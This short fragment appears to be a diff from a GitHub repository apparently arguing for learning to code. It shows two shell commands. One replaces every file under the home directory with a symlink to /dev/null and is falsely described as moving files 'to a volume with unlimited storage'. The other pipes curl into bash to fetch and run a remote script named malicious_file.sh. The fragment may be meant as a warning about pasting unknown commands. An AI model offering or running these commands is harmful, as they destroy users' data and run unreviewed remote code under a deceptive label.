Stats

 du ~/*/* | grep -o '/.*' | xargs -n 1 ln -sf /dev/null/

-D. Moves files/folders to a volume with unlimited storage:
+D. Move files/folders to a volume with unlimited storage:

 bash -c "$(curl -s https://raw.githubusercontent.com/thedzy/My-one-page-argument-for-learning-to-code/master/malicious_file.sh)"